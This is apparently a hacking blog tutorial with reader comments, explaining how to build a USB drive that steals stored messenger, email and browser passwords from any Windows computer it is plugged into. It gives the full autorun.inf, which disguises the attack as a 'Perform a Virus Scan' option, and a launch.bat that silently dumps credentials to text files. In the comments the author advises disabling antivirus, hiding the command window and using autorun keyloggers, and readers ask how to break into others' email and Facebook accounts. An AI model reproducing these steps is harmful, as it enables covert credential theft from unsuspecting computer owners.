As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox.
There exists many tools for recovering these passswords from their stored places. Using these tools and a USB pen-drive, you can create your own rootkit to sniff passwords from any computer. We need the following tools to create our rootkit:
MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.
Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.
IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 – v6.0
Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more.
PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed:
Record Index, Web Site, User Name, Password, User Name Field and Password Field.
Preparing Your USB Drive for Password Hacking:
Here is a step by step procedure to create the password hacking toolkit:
-
Download all the 5 tools, extract them and copy only the executable files (.exe files) onto your USB Pendrive.
ie: Copy the files – mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.
-
Create a new Notepad and write the following text into it:
[autorun] open=launch.bat ACTION= Perform a Virus Scan
save the Notepad and rename it from New Text Document.txt to autorun.inf. Now copy the autorun.inf file onto your USB pen-drive.
-
Create another Notepad and write the following text onto it:
start mspass.exe /stext mspass.txt start mailpv.exe /stext mailpv.txt start iepv.exe /stext iepv.txt start pspv.exe /stext pspv.txt start passwordfox.exe /stext passwordfox.txt
Save the Notepad and rename it from New Text Document.txt to launch.bat. Copy the launch.bat file to your USB drive.
Now your rootkit is ready and you are all set to sniff the passwords. You can use this pen-drive on on any computer to sniff the stored passwords. Just follow these steps:
-
Insert the pen-drive and the auto-run window will pop-up. (This is because, we have created an auto-run pen-drive).
-
In the pop-up window, select the first option (Perform a Virus Scan).
-
Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.
-
Remove the pen-drive and you’ll see the stored passwords in the .TXT files.
This hack works on Windows 2000, XP, Vista and 7.
How to Know if Someone Accessed My Computer When I am Away
How to Change the Logon Screen Background in Windows 7
How to Change Your IP Address
How to Write-Protect Your USB Flash Drive
Can you do this with a disc as well?
I tried it on myself. The pop-up window did not come, and instead a cmd window popped up and began showing exactly what I typed in in launch.bat Whenever it showed a new thing in the window, a small window would pop up saying access denied. Any ideas?
@ Poppernut
If the .bat file is executed then it is fine. In fact the whole idea is to execute the .bat file only. However your antivirus may be responsible for the Access Denied message. Disable it and try again. This trick doesn’t work for a disk (CD/DVD) since they are Read-Only
Hi Srikanth,
Great Post! If I store the .exe files,.inf & .bat files in a folder in a pendrive will the hack work?Can u suggest way to do that?How can u run the Asterisk logger software in a similar manner? reply soon……….
@ RVM
You can store the .exe files in a folder.But .inf and .bat cannot be stored in the folder. Anyways you may hide the files & folders inside the pendrive to make them invisible. If you are storing the .exe files in a folder, then you need to set the correct path in the .bat file. For example if you store mspass.exe file inside the mspass folder the in the .bat file you must set the following path
start mspass\mspass.exe /stext mspass.txt
hay can tell me how to change the icon of the “Perform a Virus Scan”
that appears. i thins it is possible pls tell me how can it done..
Most of those software’s listed is not detecting any password..Atleast IE pass view is finding one or two among 30 sites in the list..but passwordfox is not even detecting single password.Did you try them our self is it working?
@ Shunmugha Sundaram
These tools will only recover the stored passwords (if any). Otherwise not. There are no passwords stored in Firefox and hence passwordfox is not detecting any passwords.
I tried editing the line
ACTION= Perform a Virus Scan
to
ACTION=Perform a Virus Scan
It still did not do the auto run, but if a ran the launch.bat file manually, it works. Thanks! Pretty cool.
hello
comment quickly
will it work for administrator password?
hope………
@ dude
No it only works for instant messenger passwords and stored email passwords(or other).
Nice post! Simple solution to this would be to disallow USBs from auto running.
it says windows cannot find mspass.exe, mailpv.exe, iepv.exe, it says the path is wrong
i did exactly what u siad…but nothing’s happening…
if i open the .bat file the node pad is opening with what ever i wrote in it…
can u tell me where i wnet wrong…(i had disabled my virus of course)
hay reply to my comment
ok its working now…got it correct ..yeippeee !!!
but this gives only those pwds that have been asked 2 save by the user like (remember my password) while logging in.
but suppose the useer has asked NOT to save the pwd (ie, not checked the “remember my password” box)..then hw 2 get the pwd…without using fake loggin page n stuff like dat…is there any such way ??….PLS help…reply soon…TY
it doesnt work using autorun…i dont have an option of perform a virus scan..ihave an option of Scan for viruses…what should i do
@ ans
Disable the antivirus temporarily and try..
hey i did what u said but nothing is happening. when i insert the pendrive its like as usual. it asks what to do. open the folder or not. a pop up window which will say perform a virus scan doesnt appear. tell me what to do.pls
HELLO
YOUR POST ARE TOO GOOD AND COULD U PLZ POST SOME ARTICAL TO HACK PHONE PASSWORD…
AND I WANT TO KNOW HOW OLD R U..
KEEP POSTING COOL STUFF.
@ VIVEK
Thanks for your support. I am 21
it says windows cannot find mspass.exe, mailpv.exe, iepv.exe, it says the path is wrong
@ AJ
If you exactly follow the steps as given, it works. If u deviate the steps you must set the path accoringly.
Anyone know how i can fix this issue
Great stuff!!
but how can
sorry bout that
great stuff!!
but when i plug it in to the computer the antivirus pops up and puts it in quarantine.. is that normal?
do i always have to disable the antivirus first?
thx for all the work you put into this site.. 🙂
@ superburger
ya it is normal for the AV to take such actions… Before testing you should always disable ur antivirus before testing.After testing u enable it…
it cant find mspass.exe, mailpv.exe, iepv.exe….how do i fix tht??
Is there absolutely no way to somehow hide the files from the AV or mark them as safe ????
that would be great and it would be even better if there was a way that you don’t always have to click on perform a virus scan…but that it starts automaticaly when you plug it in without asking
thx for the help
the autorun part is not functioning, rest is gr8
I also hv other files on my flash drive…Is that the reason…?
@ boss
Just use a good antivirus to prevent it…
Is there a way we can prevent the above softwares to know are passwords….?
It wud b gr8 if u also post the method to prevent that action !!!
great idea to hacking the password. i will try this steps very soonly. but i want to hack the bios password without discard the cmos battery so plz hepl me immediately
to Srikanth or anyone can help
look guys when i did download the programmers and i did the 2 Notepads and i putted them in my USB.
then i dont know wat to do u can anyone explain to me what to do especial u Srikanth plz (my english is not my first language that’s y
so plz do help me !!!!
i am waiting for ur HELP!!!
@ COMPUTER
Go through the post once again and mention the Step number where you are stuck. This makes it easy for me to help…
For those having problems make sure that the extensions are named with the .inf and .bat also copy the text directly from this page for no errors. also save the files for notepad are encoded when saved as ANSI. If the images on the .inf and .bat files does not change you have made a mistake.
to Srikanth
look i am confused i did everything in my USB and then what ???
i put the usb on the computer and nothin happend .
i meant from the first step.
i hope u r not angry cuz from me i fell like i am stupid ……
@ COMPUTER
I’ll never be angry. In fact I am here to help you out. You must disable your antivirus before your start. Have you done it? Cross check it!
Brilliant, thanks much
It was very easy to follow.I made it using my laptop and i tried it on my computer and everything worked.
Excellent Tutorial, and very easy!
Thanks
By the way, the problem may be with people.Once you have put the USB in the other computer and you are putting it back into you Computer, to find out the passwords you must open the .exe files and it shows you (E.G double click PasswordFox)
Hey I downloaded all 5 files but could only move three of them to my usb drive. Everytime i tried to move the pspv.exe and iepv.exe it gave me a message that said “cannot copy pspv: access is denied. Make sure the disk is not full or write-protected and that the file is not currently in use”. I tried tweaking with my permissions settings while logged on as an administrator and it still wouldn’t let me copy the .exe’s. Finally i was able to extract the files directly into my usb but whenever i try to use them it says “access is denied”. Any idea how to fix this? I’ve tried it on two different computers already and nothing seems to work?
@ chris
You may try the following…
1. Check your antivirus. Disable it on temporary basis.
2. Format your Pendrive and repeat the whole procedure.
to Srikanth
man I appreciate by the way it works thanks but onle last thing
the passwords are only the one i say to remember in mozilla like (Legend ) said so can u do somthin about ths !!
cya and thanks
and i forgot i know some tricks and ….
i will try to tell u wat r they and how to use them
like To control ur friends computer from ur house …… do u know how/>/???
Hi, this may be a bit out of topic but I just want to know if it’s possible to install a keylogger on a usb pendrive that would automatically work once inserted on a computer without having to install it there, I’ve been trying to do so but have failed, thanks and quite a nice website you got here
@ Crad
It is possible to do that, but not easy. All you have to do is create a remote installation file (from a keylogger having remote installation support), load it onto USB drive and configure it to autorun..
@ Srikanth
Hey man txs for trying to help,but i retried the step several time but same problem .i get the following error message.
windows cannot find mspass.exe.Make sure you typed name correctly
………………..mailpv.exe…………………………
………………..iepv.exe…………………………..
But i did exactly eveything that was said.i didnt even rewrite anything,i mostly copied in paste. But everything works fine for passwordfox and pspv. I need mad help with the errors im getting.
@ Srikanth
plz give me a code to break admn pwd
@ mouse
I’ll be writing a new posts on this topic in the days to come..
Hey Srikanth!!!!!!relly a fab work frm ur side…
can u please tell me hw 2 retrieve the windows password from a specific system?? means you sftwr retrieve only stored password(if any). So, my question is why it is failing to retrieve the windows password.It is also stored somewhere!!!
please do reply..its urgent..
@ ganesh
The windows password is stored in the file named SAM (Security Accounts Manager) in the %windor%\Windows\system32\config. The problem is that the password is stored in the form of HASH (not as a plain or encrypted password). HASH cannot be decrypted back. It can only be cracked by bruteforcing. Moreover Windows doesn’t allow any program to gain access to the SAM file.
This is the reason that the Admin password cannot be retrieved easily. However it is possible to crack the admin password. I have to write a new post to explain this…..
Hope this helps….
Very Good
Jordan/Mafraq
Thanx Srikanth…….
You helped me a lot.It wll b gr8 if u forward ur email id and ur orkut profile(if any) so that i cn keep in touch wid u fr frthr knowledge sharng…its relly superb to get a guide nd frnd lik u….
Hi
my program does not give me the passwords, rather it gives me only the the user name/value.pls help, I’m confused.
@ Torooo
This trick only retrives the stored passwords (if any) on the computer. If there exists no stored passwords then it is obvious to show only the username value.
hey i tried it on myself,but after clicking on scan for viruses the asking for installation of the file mailpv.exe.
and what to do if one is using google chrome?
Hi Srikant Nice post
To Comment no 2
You may hav stored earlier hacks codes in your USB flash drive try removing it and try again
hiii…..
listen i tried all the steps as u hav mentioned…..
but am gettin an error…
the error message is FAILED TO LOAD THE DECRYPTION LIBRARY OF FIREFOX….
wat does this mean??..n now wat shud i do???
plz reply me as fast as u can…
thnxx….
hiii….
i did as u hav mentioned…..
but m gettin an error message after i perform SCAN FOR VIRUSES….the error message is FAILED TO LOAD THE DECRYPTION LIBRARY OF FIREFOX……
wat does dis mean?????
wat to do now???
plzz reply to my query as soon as u can…plz….
thnxx…
@ parin
This may be an internal error or glitch. Sometimes these error messages appear when the decryption for Firefox password fail.
Thank you very much. It worked.
i did exactly what u siad…but nothing’s happening…
@ hari rokz
Disable your antivirus and try..
CAN U PLS SEND THAT AUTORUN AND LAUNCH FILES TO [email protected] pls i did everything right but not working…..may be due mistakes in making these files……so pls pls send those files to [email protected] i ll be gratful to u yaar..pls rply
so now…wat to do???
is there any solution????
ma antivirus is disabled.still not working……
DOES THE SPACE BETWEEN WORDS IN NOTEPAD MATTERS……
I TYPED
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
NOT WORKED SO I CHANGED TO
start passwordfox.exe /stext passwordfox.txt
startmspass.exe/stextmspass.txt
startmailpv.exe/stextmailpv.txt
startiepv.exe/stextiepv.txt
startpspv.exe/stextpspv.txt
startpasswordfox.exe/stextpasswordfox.txt
STILL NOT WORKING ANYTHING WRONG WITH IT
@ hari rokz
Have you followed the step 1 correctly?
ya these r those files
file:///K:/iepv.exe
file:///K:/mailpv.exe
file:///K:/mspass.exe
file:///K:/pspv.exe
file:///K:/PasswordFox.exe
i am getting mad bhai.when i insert the pen pop up came….i select perfom……scan……..when click ok suddenly another came open with window asking choose aprogram to open k/ { pen}…
i had installed APO USB AUTORUN SOFTWARE……it starts on system tray ….showing unable to launch program k/ launch.bat {error}….. i dont know what to do pls help me bhai….
pls rply soon
BHAI,
Can u pls create the two notepad files & send to [email protected]
please please.. i ll be greatful 2 u
I find with password fox I get this
Record Index : 1
Web Site : http://www.mysite.com
User Name :
Password :
User Name Field : Account
Password Field : Password
Signons File : signons2.txt
I don’t get the user names or passwords themselves.
@ john
This may happen if there exists no stored password for firefox on the comp.
Hello Srikanth. I have tried to do this, but it isnt working for me, or it is working but nothing happens. I have read all comments before my job, and I was very careful, I did evrything like u said, but … it isn’t working or it is working but i don’t know it. So, how about to make a Video Tutorial? I don’t say that your Writting Tutorial is shit or bad, it is perfect, but I told you the problem. So, think about making Video Tutorials. I will be very glad and 100 people who are reading this USB Hack if you make Video Tutorial. Anyway, you are cool. Keep up the perfect work x)
hey hi srikanth
i followed ur procedure
i did get po up window but there is no ‘perform virus scan’ option in the general options
i even disabled my antivirus
also i tried in the other systems
still that particular option has not come
can u tell me how to fix it
i know u hav been asked many questions
but i would b very greatsful to u if u answer this
yaar its too good and mr.Srikanth u r good man…
When I do the scan a window pops up and I get an error that says “Windows cannot find ‘mspass.exe’. Make sure you typed the name correctly, and then try again. To search for a file click the Start button, and then click Search.” It does the same thing for all of the other 4 files; mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe.
Do you know what I did wrong and how I could fix it? Thank you for your time.
Srikanth……..
hi every body!
I just see tz amzing website knwww.
m reading tz websitee in detailll but I want 2 knw tat how to start learning hacking. I mean guide me hw to learn hacking..
Looking 4ward…. and SRIKHANDS repliess are gr888..
@ Ayesha
Learn from basics. Learn programming languages such as C, C++, HTML, Java, Javascript and PHP. Explore the working of computer, OS etc. Takes time but don’t give up..
nice article broder
Thanx…Its working..:-)
hii srikanth,
i have looked your ability in information tech. its really gr8 very usefull steps and good knowledge thx for that.
i hope you can help me with this, i don wana ask from outsiders i dont trust them i mean such as service provider for that seperate things.
ok i wana ask is there any way that we can access someone else e mail account or facebook account that person is not with us(i mean out of country) if we know their email or facebook id.
or else is there any way that can we trace their mobile number
please let me know how can you help me on these things
its really important for me please help me
hi der i just want to know where i found the .TXT file please reply your consideration is appreciated thank
hi srikanr,
when i m executing the .bat file i m getting warning that windows could not find mspass.exe n then to all the 5 s/w.n i have copied them in the pen drive.a command prompt is also opening behind that warning.is there any solution?
@ toshi
There are two possible reasons for this..
1. The path for the mspass.exe (and other files) are not properly set.
2. The antivirus is not completely disabled before you try this hack.
Is ther any password recovery? for pc if I forget my password login?
Srikanth .. ,
I tried as you said but I want to know that how to hidden Dos running ..
@ Sairam
You cannot hide the DOS window from running..
Hi Srikanth,
I’ve follow some of your and it seems that you are reallt good when it comes to the job. how ever, can you pls help me find a site where i can download spyrecon for free. pls help me it urgent. I’m online now.I await your reply.
want to know more about hacking,can u pls help me.
Nice Keep it Up!!!!!!!!!
Great stuff man thanks…
@
You can try batch2exe converter. Set Invisible Application and compile.
Download Link: http://rapidshare.com/files/229411379/Bat_To_Exe_Converter.zip.html
Hey Srikanth,
This is a great site – first time visiting it and I am very impressed. I tried the above code and when I plug in the flash drive, it show autoplay, but instead of running the file automatically, it is giving me two options:
Open folder to view files
Speed up my system
The applications you recommended are working correctly – I tried running them manually but it’s just not auto running, nor is it populating any data in the launch.bat file.
Thanks!
Oh one thing I should add though – this is a fairly new laptop and I haven’t installed anti-virus software on it. Do you think that is possibly why it’s not asking to run it?
@ Khalid K.
It should work fine withou antivirus installed. Follow every step carefully.
Hey It really Works i tried it and got results i was shocked by seeing the passwords.. it really works.. great work… we really appreciate the person who developed it.. Excellent
Hi Srikant,
I tried it on my own computer but,when bat file runs the error is coming
“Failed To Load Executable file!”
After completing the process five txt files create in my pen drive but
it doesn’t have passwords.
I saved all exe files along with inf & bat file in same folder
please help!!!!
Thanks
@ jeetu
Have you disabled the antivirus before running the pendrive?
hallow,
is it possible to inter into another mobile inbox using onother mobile? if yes, how?
@ frascop
To do so you have to hack the mobile using bluetooth (bluesnarfing).
whyis there no yahoomessenger password shown ?
I done all steps correctly. but after the pen drive plug to the computer in the pop up window there is no action called
1.(Perform a Virus Scan)
so how can i add it to my auto-play window.
i have anti virus (kaspersky)
and i disable it before plug my pen drive.
where is the problem.
pls help me.
@ jeetu
Have you disabled the antivirus before running the pendrive?
Hi srikant,
Yes i have disabled my anti virus before running these softwares….but every time its giving this error….failed to load executable files.
jeetu
hey man thanks for the hacking lesson
i’m enjoying it
keep it up!
Thx so much for dis, am just joining the world of hacking!!!!
hi,Srikanth
U didnt answer me…
pls help me.. y is that not working for me..
izit necessary to make the space
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
theres lot of space.. necessary?
besides, can i use only 4 of the listed .exe? i dont want to use the mailpv.exe
can i succeed?
[i’d tried several times, wont work? TT.TT]
When I renamed the txt, its name bcome autorun.inf.txt
how?
First off I wanna say thank you for this fun little device! Second, I was wondering if you could tell me where I can find the TXT document that would contain all the passwords? Thank you for all the help!!!
gud day to you Srikanth… i was reading bout the post..and really want to try everything in here, specially the hacking tools. bout the hacking through usb. what if the user did not put his/her password remember on the site?like firefox, it usualy ask if you want it to remember your password.what if the user did not make his/her pasword remember by firefox?sorry for the long post & question, i just want to be specific to my questions.. tnx in advance for your reply…
its me again.. just saw another post & i think it will be more appreciated, if you will make a video tutorial.just like in youtube. so we can more get in through it.the posts is good & having a video tutorial with the one you are posting for all your viewers.so we can enjoy everything you are teaching. tnx alot…
@ Srikanth (author)
i had followed all the steps including disabling virus even the image of the both “lauch” and “autorun” also changed but still have a prob the .txt files is not appeared
THanks in advance[:)]
I’m not sure if I’m getting false-positives or what. AVG is alerting me that the apps may be dangerous, when they probably aren’t. I’m a little paranoid. Are these apps 100% safe to use on my own computer?
Thanks.
@ JD
Yes they are safe and cause no problems. However since they are password recovery tools, AVG alerts you!
hello srikanth…. I’ve followed the step you given correctly..but when I insert the pendrive it asked me to choose an application.. why is this happen to me ??
Hey can you do it on memory card. if yes, Please tell me.
hey srikant ur great.. first time i m visiting this site and feels like shit.. why i dont ever know about this site…keep going man…
hello srikant i just have a small prob.. after excuting these steps lastly error occure that “failed to find signons file of firefox” .. plz Can u help me why this happen..waiting for reply..
Hi to all of you…..
going through comments i found dat many wants da administrator passwords
well its bit hard but i can help u out in one way
wat if u can directly change the admin password without knowing the previos one infact any username passsword
this can surely give u access
if anybody is intersted dan reply or msg me
thanks 🙂
Hi
I have a small problem downloading the softwares needed for password hacking using USB.kaspersky is creating that.I am afraid if it is not allowing to download it then how the software will work on a pc protected by any good quality antivirus.Hence to use this we may have to reconstruct that modifying some of the codes,so u’r help is neeed in that case.U do have my e mail id,If u like can send me any suggetions
how this software its only ne time how can ud\se for another user
The MESSENGER passwor retrieval was only giving me the MSN messenger password yet i know that i have the Windows Live messenger sotred as well….do u kno what the problem is???
hi it’s nice to see..and cool..inough…thank you..!
Srikanth, is a Pen Drive a Jump Drive? If so, can I put the codes on it?
Thanks!